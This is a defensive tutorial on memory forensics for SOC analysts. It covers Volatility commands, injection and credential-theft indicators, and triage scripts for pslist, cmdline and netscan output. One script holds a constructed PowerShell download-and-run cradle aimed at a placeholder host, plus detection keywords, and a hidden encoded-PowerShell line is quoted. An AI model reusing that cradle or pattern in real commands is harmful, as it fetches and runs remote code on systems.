Memory forensics is the process of analyzing the RAM (volatile memory) of an endpoint to uncover evidence of malicious activity that may not appear in logs or on disk.
It is essential for detecting fileless malware, in-memory implants, credential theft, process injection, rootkits, and advanced attacker techniques that EDR or SIEM may only partially capture.
This chapter explains memory forensics in full-depth SOC style, including acquisition, tools, artifacts, detection techniques, and practical investigation workflows.
Why Memory Forensics Matters in SOC
Attackers increasingly use fileless and in-memory techniques, meaning no malware file touches the disk.
Memory forensics reveals:
- Process injections
- Malicious threads inside legitimate processes
- Cobalt Strike beacons
- Reflective DLL loading
- LSASS credential dumpers
- Suspicious network connections
- In-memory PowerShell
- Obfuscated shellcode
- Persistence artifacts loaded in RAM
Memory is the single most accurate source for detecting advanced intrusions.
What Lives in Memory (Practical Breakdown)
Memory contains:
- All running processes
- Loaded DLLs
- Command-line arguments
- Network connections
- Registry keys cached by the OS
- Encryption keys
- Credentials
- Malware payloads
- Script engines (PowerShell, WMI, mshta)
- Shellcode and injected threads
If an attacker is active, traces exist in RAM.
Memory Acquisition (SOC Techniques)
Before analyzing memory, you must acquire it from the system.
Common tools:
- FTK Imager
- Magnet RAM Capture
- Belkasoft RAM Capturer
- WinPMEM
- DumpIt
- AVML (Linux)
Requirements:
- Acquire in raw .raw or .mem format
- Use trusted acquisition methods
- Perform acquisition before system reboot
- Store dump on isolated media
- Hash the dump (MD5/SHA256) for integrity
Example workflow:
dumpit.exe → creates memorydump.mem → analyst extracts artifacts
Analysis Tools Used in SOC & DFIR
Volatility (most widely used)
Supports Windows, Linux, macOS.
Rekall
Memory analysis framework created by Google.
Redline
Lightweight memory + system triage tool.
EDR Memory Snapshots
Some EDRs (CrowdStrike, SentinelOne) provide built-in memory snapshots.
Core Memory Forensics Techniques (SOC Focus)
Below are the essential methods analysts use.
1. Process Enumeration
Identify all processes with:
volatility -f memdump.mem pslist
volatility -f memdump.mem pstree
Analysts check for:
- Unknown processes
- Suspicious parent-child chains
- Signed vs unsigned executables
- High-privilege processes spawning unexpected children
Example:
powershell.exe running under WINWORD.exe
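A small Python triage script, added here as an example and not part of the original text, that parses pslist output and flags the two parent-child anomalies this section describes: a document application spawning a script engine (the WINWORD.EXE → powershell.exe case above) and a core Windows process such as svchost.exe whose parent is not the expected one. The pslist sample, the process-name sets and the expected-parent table are constructed assumptions, not output from a real dump.

```python
from collections import namedtuple

Proc = namedtuple("Proc", "name pid ppid")

# Constructed sample of `volatility -f memdump.mem pslist` output; not taken from a real dump.
SAMPLE_PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
------------------ -------------------- ------ ------ ------ -------- ------ ------ -------------------
0xfffffa8000ca0b30 System                    4      0     85      503 ------      0 2024-01-10 10:00:00
0xfffffa8000f0a040 services.exe            620    520     11      250      0      0 2024-01-10 10:00:03
0xfffffa8001d33b30 svchost.exe             820    620     10      480      0      0 2024-01-10 10:00:05
0xfffffa8001a0b030 explorer.exe           1820   1788     35     1102      1      0 2024-01-10 10:01:12
0xfffffa8001b11b30 WINWORD.EXE            3104   1820     12      420      1      0 2024-01-10 10:15:40
0xfffffa8001c22060 powershell.exe         3356   3104      9      310      1      0 2024-01-10 10:15:42
0xfffffa8001e44a10 svchost.exe            4412   1820      3       60      1      0 2024-01-10 10:16:01
"""

DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_ENGINES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# Core Windows processes have a fixed legitimate parent (assumed table); anything else is worth a look.
EXPECTED_PARENT = {"svchost.exe": "services.exe", "lsass.exe": "wininit.exe", "services.exe": "wininit.exe"}

def parse_pslist(text):
    """Parse pslist rows into Proc records keyed by PID; header and separator lines are skipped."""
    procs = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].startswith("0x"):
            continue
        procs[int(fields[2])] = Proc(fields[1], int(fields[2]), int(fields[3]))
    return procs

def find_suspicious_chains(procs):
    """Return (reason, parent_name, child_name, child_pid) for anomalous parent-child pairs."""
    findings = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        if parent is None:
            continue                       # parent already exited; pstree shows the same gap
        child, par = p.name.lower(), parent.name.lower()
        if par in DOCUMENT_APPS and child in SCRIPT_ENGINES:
            findings.append(("script engine spawned by document app", parent.name, p.name, p.pid))
        elif child in EXPECTED_PARENT and par != EXPECTED_PARENT[child]:
            findings.append(("unexpected parent for core process", parent.name, p.name, p.pid))
    return findings

if __name__ == "__main__":
    for reason, parent, child, pid in find_suspicious_chains(parse_pslist(SAMPLE_PSLIST)):
        print(f"[!] {child} (PID {pid}) under {parent}: {reason}")
```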
2. Detecting Process Injection
Attackers inject malicious threads into legitimate processes.
Indicators:
- Suspicious memory regions
- RWX (Read-Write-Execute) pages
- Threads pointing to unknown memory areas
- In-memory only DLLs
Volatility commands:
malfind
ldrmodules
handles
Suspicious example:
Injected code inside explorer.exe, no backing file
3. LSASS Credential Dump Detection
LSASS memory contains credentials; attackers target it.
Indicators:
- Unknown process accessing LSASS
- Mimikatz strings
- Unusual handles
- Suspicious threads
Volatility:
handles -p lsass.exe
malfind -p lsass.exe
If memory shows Mimikatz artifacts → high-severity breach.
4. Detecting Cobalt Strike & RATs in Memory
Common indicators:
- Encrypted beacon configuration
- Jitter patterns
- Pipe names
- Injected threads in:
  - explorer.exe
  - svchost.exe
  - dllhost.exe
  - rundll32.exe
Volatility:
psxview
malfind
netscan
Example finding:
Injected beacon thread in dllhost.exe
5. Script-Based Malware Analysis (PowerShell / wscript)
Fileless malware often leaves script content in memory.
Volatility:
cmdline
consoles
Detect:
- Deobfuscated PowerShell commands
- Base64 strings
- Malicious VBA artifacts
Example:
powershell -nop -w hidden -enc JAB...
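Added example, not code from the original text: a Python routine that walks cmdline output, pulls out the -enc argument and decodes it. PowerShell's encoded command is base64 over UTF-16LE text, which is why encoded command lines so often begin with JAB (the encoding of a leading $ followed by a letter). The cmdline sample and the plaintext it decodes to are constructed; the keyword list is an assumed starting point, not a complete signature set.

```python
import base64
import re

# Constructed plaintext that a real dump would only reveal after decoding; not from a real incident.
_PLAINTEXT = "$p = 'http://example.invalid/p'; IEX (New-Object Net.WebClient).DownloadString($p)"
_ENCODED = base64.b64encode(_PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed sample of `volatility -f memdump.mem cmdline` output.
SAMPLE_CMDLINE = f"""\
************************************************************************
explorer.exe pid:   1820
Command line : C:\\Windows\\Explorer.EXE
************************************************************************
powershell.exe pid:   3356
Command line : powershell -nop -w hidden -enc {_ENCODED}
"""

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String", "-w hidden")

def decode_encoded_command(blob):
    """Decode a PowerShell -enc argument (base64 of UTF-16LE) or return None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_cmdline(text):
    """Return (pid, decoded_command, matched_keywords) for every encoded PowerShell command line."""
    findings = []
    pid = None
    for line in text.splitlines():
        m = re.match(r"\S+ pid:\s+(\d+)", line)
        if m:
            pid = int(m.group(1))          # remember which process the next 'Command line' belongs to
            continue
        m = ENC_FLAG.search(line) if line.startswith("Command line :") else None
        decoded = decode_encoded_command(m.group(1)) if m else None
        if decoded is None:
            continue
        # keywords are checked on both the raw line (-w hidden) and the decoded payload (IEX ...)
        hits = [k for k in SUSPICIOUS if k.lower() in (line + decoded).lower()]
        findings.append((pid, decoded, hits))
    return findings

if __name__ == "__main__":
    for pid, decoded, hits in scan_cmdline(SAMPLE_CMDLINE):
        print(f"[!] PID {pid}: {decoded}\n    indicators: {hits}")
```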
6. Network Connection Analysis
Volatility:
netscan
Identify:
- Outbound C2 connections
- Unusual ports
- Suspicious remote IPs
- Processes making connections
Example:
svchost.exe → 91.22.113.10:443
If svchost is making foreign outbound traffic → highly suspicious.
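Added example, not part of the original text: a Python triage pass over netscan output that applies the two checks this section lists, a system process talking to a non-private address and an unusual destination port. The netscan rows are constructed (91.22.113.10 is the address used in the text; the other public addresses are made up), and the watchlist is an assumption; in production, Windows Update and telemetry destinations need an allowlist so that legitimate svchost.exe traffic does not drown the signal.

```python
import ipaddress
import re

# Constructed sample of `volatility -f memdump.mem netscan` output; UDP rows carry no State column.
SAMPLE_NETSCAN = """\
Offset(P)  Proto  Local Address    Foreign Address    State        Pid   Owner
0x7d6f2a10 TCPv4  10.0.0.5:49712   91.22.113.10:443   ESTABLISHED  820   svchost.exe
0x7d6f3b20 TCPv4  10.0.0.5:49801   10.0.0.20:445      ESTABLISHED  4     System
0x7d6f4c30 TCPv4  10.0.0.5:49822   91.22.113.11:8443  ESTABLISHED  3356  powershell.exe
0x7d6f5d40 TCPv4  0.0.0.0:135      0.0.0.0:0          LISTENING    760   svchost.exe
0x7d6f6e50 UDPv4  0.0.0.0:5355     *:*                             820   svchost.exe
0x7d6f7f60 TCPv4  10.0.0.5:49850   91.22.113.12:443   ESTABLISHED  2100  msedge.exe
"""

# Only TCP rows have all six columns; UDP rows are skipped on purpose.
ROW = re.compile(r"^0x[0-9a-fA-F]+\s+(TCPv[46])\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+)")
# Assumed watchlist: processes that rarely need to reach the Internet directly.
WATCHLIST = {"svchost.exe", "explorer.exe", "dllhost.exe", "rundll32.exe", "lsass.exe",
             "powershell.exe", "wscript.exe", "mshta.exe"}
COMMON_PORTS = {80, 443}

def split_endpoint(endpoint):
    """Turn 'ip:port' into (ip_address, port); IPv6 is handled by splitting on the last colon."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host), int(port)

def triage_netscan(text):
    """Return (pid, owner, foreign_endpoint, reasons) for external connections worth review."""
    findings = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        _proto, _local, foreign, _state, pid, owner = m.groups()
        try:
            ip, port = split_endpoint(foreign)
        except ValueError:
            continue
        if not ip.is_global:               # private, loopback, link-local and 0.0.0.0 are skipped
            continue
        reasons = []
        if owner.lower() in WATCHLIST:
            reasons.append("watchlisted process talking externally")
        if port not in COMMON_PORTS:
            reasons.append(f"unusual destination port {port}")
        if reasons:
            findings.append((int(pid), owner, foreign, reasons))
    return findings
```

Calling triage_netscan(SAMPLE_NETSCAN) reports the svchost.exe and powershell.exe rows and stays silent on the browser connection to port 443.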
7. DLL and Module Verification
Attackers load malicious DLLs into memory.
Volatility:
dlllist
ldrmodules
Check:
- Missing DLL signatures
- Unbacked DLLs
- DLLs in non-standard paths
Example:
C:\Users\Public\update.dll loaded inside explorer.exe
8. Detecting Persistence Artifacts
Memory reveals:
- Registry keys
- WMI subscriptions
- Scheduled tasks
- Autorun programs
Volatility:
printkey
svcscan
wmiobj
Example:
WMI permanent event subscription calling malicious script
9. Extracting Malware From Memory
Analysts dump samples for sandbox analysis.
Volatility:
memdump
procdump
You can extract:
- Payloads
- Stagers
- Injected DLLs
- Shellcode
Example:
Extract payload.exe for Hybrid-Analysis
Memory Forensics Workflow (SOC Standard)
A typical workflow:
Step 1 — Acquire memory
Create .mem or .raw dump.
Step 2 — Identify suspicious processes
Use pslist, pstree.
Step 3 — Analyze injected processes
Use malfind.
Step 4 — Examine network activity
Use netscan.
Step 5 — Extract suspicious artifacts
Use procdump, yarascan.
Step 6 — Perform IOC enrichment
Validate hashes, domains, IPs.
Step 7 — Map behaviors to MITRE ATT&CK
Example:
- T1055 (Process Injection)
- T1003 (Credential Access)
- T1105 (Ingress Tool Transfer)
Step 8 — Write IR recommendations
Containment, eradication, investigation.
Practical Memory Forensics Examples
Example 1 — Detecting Fileless Malware
malfind → RWX memory region in powershell.exe
netscan → outbound to C2
cmdline → encoded command found
Conclusion: PowerShell-based implant.
Example 2 — Detecting Cobalt Strike
dllhost.exe with injected thread
netscan → beacon pattern
yarascan → matches cobalt beacon signatures
High-severity intrusion.
Example 3 — Detecting Credential Theft
procdump lsass.exe artifacts
strings show "mimikatz"
Immediate containment required.
Example 4 — Detecting Crypto Miner
xmrig in memory
high CPU usage
outbound to mining pool
Confirms infection even if binary deleted.
Intel Dump
- Memory forensics identifies fileless malware, injections, C2 beacons, and credential theft.
- Tools include Volatility, Rekall, Redline, and EDR snapshots.
- Analysts examine processes, DLLs, network connections, injected code, and PowerShell commands.
- Memory reveals artifacts not present on disk or in logs.
- Use memory analysis to extract malware, map MITRE techniques, and confirm advanced intrusions.